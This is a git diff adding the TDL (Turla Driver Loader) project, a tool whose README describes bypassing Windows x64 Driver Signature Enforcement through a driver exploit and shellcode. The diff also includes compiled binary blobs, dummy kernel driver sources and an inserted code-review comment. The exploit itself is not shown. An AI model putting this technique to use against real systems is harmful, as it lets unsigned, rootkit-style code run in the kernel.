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 CSZc!n literal 0 HcmV?d00001 
diff --git a/Compiled/dummy.sys b/Compiled/dummy.sys new file mode 100644 index 0000000000000000000000000000000000000000..8a043a68e950b437ff81359a94758e93817e7abe GIT binary patch literal 2560 zcmeHJ&1(}u6n{zD;8$uSZjHryH zFBgbzC^Qj??3?gIug#x%_vpx#_8%>_ALBarYq8x%e8HC53ohC&&ZwoT;O>-JJ_DdU z2*KTR&#!hkn{X8N2M+)Q(IN^Jl0+SKXQ_YyF-LzGyU|h4izDv2b`~H2H<9XX>cIB( zmc`u;CjjE!%o_;+X7cZXX(W3@NpMBBWPnqGpprcJoa!9!Y6~hUcC-= zfc?+`Jjq+A$Rx`Aw7}0qgEUz zy8azK(KQ?;`&+quaO}RDO0I>BsjpKXo#>Lwcq16Cs3iilBDWE8_S>BO$%#Hi&-$0o ze~Uyl%^+oN=wyy^Mm6__FiFg&X;GbUnN=t;Ety*cuNJY|Bq`wyg6MLsMinAkXoBvD zX|B#wo?#Ymy7ufb-DR1RB+rc!HBEAw#I!nz$7;us5%2oHy%+NxzJuNVC!Y*W>jk%l z8Bsz(Q~GQrMjgWtXSn#Rsb5otZ{)_=j)tPX8EbYv*EnC&6-u92ofoW literal 0 HcmV?d00001 
diff --git a/Compiled/dummy2.sys b/Compiled/dummy2.sys new file mode 100644 index 0000000000000000000000000000000000000000..959260ac79fe10d23e48cf7e1fed10ceb20622e6 GIT binary patch literal 4096 zcmeHKZ){Ul6hG^_Irg`P)y)Cnfp2jHGm9gEFNDs%np^2u?Yf~b?MnAXU+CJ}zWo6c zkPM9V+5_apY1UI$6X>p;y|^xGJoch2&67P-24A*(D6d`{mY}no2Pj`kUbypKWUx8ZU@Cz8!7vg-^%F zfgi@Ujc+yaeG~mkIKsL4nfcsA{V!SR_|n}ydD~^0OI4O?q6%2}!gz5)Y+NB{39q?s zAu7k}^TN&KgTSZZJW&btftq#7!(ZEz7SsK*lc>eia+QOK6}RtJ7l;;5;oGXpqbmBR zm!aZQE{EjT4wV;yDAJnj52+!d%{c?#1FGbWLUCfst%)qpoIBQF^01}F#R;BgxhKGF zU-M0c!Q|Bfi;6&Wwy1ee{TJ;3OZSQuEFBeXEUk)-E7;g22h*-Iz2V?zruH$vAJ~>Fb(?jrXu(Fd<$HD3rVWkOnR7Ya3%Xhl_mfZz`+j)st09`WD8m*v zZM$F_+hDT|o!4B|lD5n$X{BjNY|&g52v7wMsQmyK1;f4`^h{~ym0gr^Szonxm1JBM z-EZ9hRL`9Mu0{J{KmXh>mhC%-VYH)dC(=O&OLs12+A+gE%bayoWK2^D<--vjJqLApAn}N2(u-U0S^t60(dxV zw&tfy=SQ>7ZF%QKhW$7Wn(5tFnck5x>|dBI_lR3xK9}Jr9bVm?F?Z+?4!b0S!^I7Y zm2U$PeLrLBwU~2Vi#sz=w~@DNTG5uY!`d~&o&sx&QTOs;zEr)t0fU?}>~eO|`qmq(Jgw$|^vY+8(-JB9UeqXTT z$)M!!@wnVUSLgD8ztfxNpuI!4r4IV`?%Ubs@Rm#&;#@#Dmt7fW7WH?n8(bZa zDq*h@TU*S+f&70;q&>UV4LN*0hdXn)H;29)=6A+YUrCk+sJy1&%n^4)<2Am_dZKyr4P zF9AuEl05lKA{*w}UlP4Zp8h4#XXbxN444l9`L9<@5kvSh|-#-7;p|&c5Pi z)AA-PULB7CjJE&-)wSRmfE;aFYL>#n)BS0~z8OS3*TxR^-TMB@<^wm<%{ueqpX&ZM zQ%CX5j{Co{=pH-7bpdjRa<}*5fpWhZ<>{(Bri76WyVRr-TZ7+MsV6?*iVr5DvMT%K z=ZEAJ{;n}gK3NqfBci2~_Uw9zmJ}>zS|h^#uU_Lrbi|3N@zmO6EZQoM%6C}I6sA7` D^jrH4 literal 0 HcmV?d00001 diff --git a/README.md b/README.md new file mode 100644 index 0000000..db1b469 --- /dev/null +++ b/README.md 
@@ -0,0 +1,40 @@
+
+# TDL (Turla Driver Loader)
+## Driver loader for bypassing Windows x64 Driver Signature Enforcement
+
+For more info see
++ Defeating x64 Driver Signature Enforcement http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3322
++ WinNT/Turla http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193
+
+# System Requirements and limitations
+
++ x64 Windows 7/8/8.1/10.
++ TDL designed only for x64 Windows, Vista not listed as supported because it is obsolete.
++ Administrative privilege is required.
++ Loaded drivers MUST BE specially designed to run as "driverless".
++ No SEH support for target drivers.
++ No driver unloading.
++ Only ntoskrnl import resolved, everything else is up to you.
++ Dummy driver examples provided.
+
+You use it at your own risk. Some lazy AV may flag this loader as malware.
+
+# Differences between DSEFix and TDL
+While both DSEFix and TDL uses advantage of driver exploit they completely different on way of it use.
++ DSEFix manipulate kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL). Main advantage of DSEFix is it simplicity - you turn DSE off - load your driver (or patched one) and nothing else required. Main disadvantage of DSEFix is that on the modern version of Windows (8+) g_CiOptions variable is subject of PatchGuard (KPP) protection, which mean DSEFix is a potential BSOD-generator.
++ TDL does not patch any kernel variables, which makes it friendly to PatchGuard. It uses small shellcode which maps your driver to kernel mode without involving Windows loader (and as result without triggering any parts of DSE) and executes it. This is main advantage of TDL - non invasive bypass of DSE. There are many disadvantages however - the first and main -> your driver MUST BE specially created to run as "driverless" which mean you will be unable to load *any* driver but only specially designed. Your driver will exist in kernel mode as executable code buffer, it won't be linked to PsLoadedModuleList, there will be other limitations. However this code will work at kernel mode and user mode application will be able communicate with it. You can load multiple drivers, of course if they are not conflict with each other.
+
+# Build
+
+TDL comes with full source code.
+In order to build from source you need Microsoft Visual Studio 2015 U1 and later versions. For driver builds you need Microsoft Windows Driver Kit 8.1 and/or above.
+
+
+# Authors
+
+(c) 2016 TDL Project
+
+# Credits
+
++ R136a1
++ N. Rin
diff --git a/Source/DummyDrv/dummy.sln b/Source/DummyDrv/dummy.sln
new file mode 100644
index 0000000..28627ee
--- /dev/null
+++ b/Source/DummyDrv/dummy.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Release|x64 = Release|x64
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
+ {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
+ {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Source/DummyDrv/dummy/dummy.vcxproj b/Source/DummyDrv/dummy/dummy.vcxproj
new file mode 100644
index 0000000..da49f9f
--- /dev/null
+++ b/Source/DummyDrv/dummy/dummy.vcxproj
@@ -0,0 +1,239 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + Debug + ARM + + + Release + ARM + + + Debug + ARM64 + + + Release + ARM64 + + + + {3D8146DE-8064-46C0-9E70-CEEC357B2290} + {1bc93793-694f-48fe-9372-81e2b05556fd} + v4.5 + 12.0 + Debug + Win32 + dummy + 8.1 + + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver8.1 + Driver + KMDF + Universal + true + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + + + + + + + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + 
.\output\$(Platform)\$(Configuration)\ + + + + false + true + Speed + false + true + All + true + CompileAsC + true + false + + + false + false + true + true + true + DriverEntry + true + true + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + + + + + + + + \ No newline at end of file diff --git a/Source/DummyDrv/dummy/dummy.vcxproj.filters b/Source/DummyDrv/dummy/dummy.vcxproj.filters new file mode 100644 index 0000000..267d15c --- /dev/null +++ b/Source/DummyDrv/dummy/dummy.vcxproj.filters @@ -0,0 +1,26 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {8E41214B-6785-4CFE-B992-037D68949A14} + inf;inv;inx;mof;mc; + + + + + Source Files + + + \ No newline at end of file diff --git a/Source/DummyDrv/dummy/dummy.vcxproj.user b/Source/DummyDrv/dummy/dummy.vcxproj.user new file mode 100644 index 0000000..5979185 --- /dev/null +++ b/Source/DummyDrv/dummy/dummy.vcxproj.user @@ -0,0 +1,6 @@ + + + + Off + + \ No newline at end of file diff --git a/Source/DummyDrv/dummy/main.c b/Source/DummyDrv/dummy/main.c new file mode 100644 index 0000000..dade601 --- /dev/null +++ b/Source/DummyDrv/dummy/main.c 
@@ -0,0 +1,63 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: MAIN.C
+*
+* VERSION: 1.00
+*
+* DATE: 29 Jan 2016
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include
+
+DRIVER_INITIALIZE DriverEntry;
+#pragma alloc_text(INIT, DriverEntry)
+
+/*
+* DriverEntry
+*
+* Purpose:
+*
+* Driver base entry point.
+*
+*/
+NTSTATUS DriverEntry(
+ _In_ struct _DRIVER_OBJECT *DriverObject,
+ _In_ PUNICODE_STRING RegistryPath
+ )
+{
+ LARGE_INTEGER tm;
+ PEPROCESS Process;
+
+ tm.QuadPart = -10000000;
+
+ /* This parameters are invalid due to nonstandard way of loading and should not be used. */
+ UNREFERENCED_PARAMETER(DriverObject);
+ UNREFERENCED_PARAMETER(RegistryPath);
+
+ DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry);
+
+ Process = PsGetCurrentProcess();
+
+ do {
+
+ KeDelayExecutionThread(KernelMode, FALSE, &tm);
+
+ DbgPrint("I'm at %s, Process : %lu (%p)",
+ __FUNCTION__,
+ (ULONG)PsGetCurrentProcessId(),
+ Process
+ );
+
+
+ } while (1);
+
+ return STATUS_SUCCESS;
+}
diff --git a/Source/DummyDrv2/dummy.sln b/Source/DummyDrv2/dummy.sln
new file mode 100644
index 0000000..28627ee
--- /dev/null
+++ b/Source/DummyDrv2/dummy.sln
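Review bot: `return STATUS_SUCCESS;` at the end of DriverEntry is unreachable because the `do { ... } while (1);` above it never exits, and nothing in the file says that the thread the loader used to call the entry point is consumed for the lifetime of the system. Since this is the sample that users of the loader will copy, a comment at the loop should make that contract explicit, e.g. `/* Never returns: the thread that called DriverEntry stays in this loop for the lifetime of the system. */`. The `#pragma alloc_text(INIT, DriverEntry)` above it places a function that never returns into the discardable INIT section; under a conventional loader that section is released once DriverEntry returns, so the pragma is presumably only harmless here because the loader is nonstandard, and a comment saying so would keep it from being copied into a regular driver. The comment `/* This parameters are invalid ... */` should read `These parameters are invalid`.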
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Release|x64 = Release|x64
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
+ {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
+ {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj b/Source/DummyDrv2/dummy/dummy.vcxproj
new file mode 100644
index 0000000..8fa877b
--- /dev/null
+++ b/Source/DummyDrv2/dummy/dummy.vcxproj
@@ -0,0 +1,242 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + Debug + ARM + + + Release + ARM + + + Debug + ARM64 + + + Release + ARM64 + + + + {3D8146DE-8064-46C0-9E70-CEEC357B2290} + {1bc93793-694f-48fe-9372-81e2b05556fd} + v4.5 + 12.0 + Debug + Win32 + dummy + 8.1 + + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver8.1 + Driver + KMDF + Universal + true + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + + + + + + + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + 
.\output\$(Platform)\$(Configuration)\ + + + + false + true + Speed + false + true + All + true + CompileAsC + false + false + + + false + false + true + true + true + DriverEntry + true + true + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj.filters b/Source/DummyDrv2/dummy/dummy.vcxproj.filters new file mode 100644 index 0000000..8c93f38 --- /dev/null +++ b/Source/DummyDrv2/dummy/dummy.vcxproj.filters @@ -0,0 +1,31 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {8E41214B-6785-4CFE-B992-037D68949A14} + inf;inv;inx;mof;mc; + + + + + Source Files + + + + + Header Files + + + \ No newline at end of file diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj.user b/Source/DummyDrv2/dummy/dummy.vcxproj.user new file mode 100644 index 0000000..5979185 --- /dev/null +++ b/Source/DummyDrv2/dummy/dummy.vcxproj.user @@ -0,0 +1,6 @@ + + + + Off + + \ No newline at end of file diff --git a/Source/DummyDrv2/dummy/main.c b/Source/DummyDrv2/dummy/main.c new file mode 100644 index 0000000..7b434d3 --- /dev/null +++ b/Source/DummyDrv2/dummy/main.c 
@@ -0,0 +1,296 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: MAIN.C
+*
+* VERSION: 1.00
+*
+* DATE: 29 Jan 2016
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
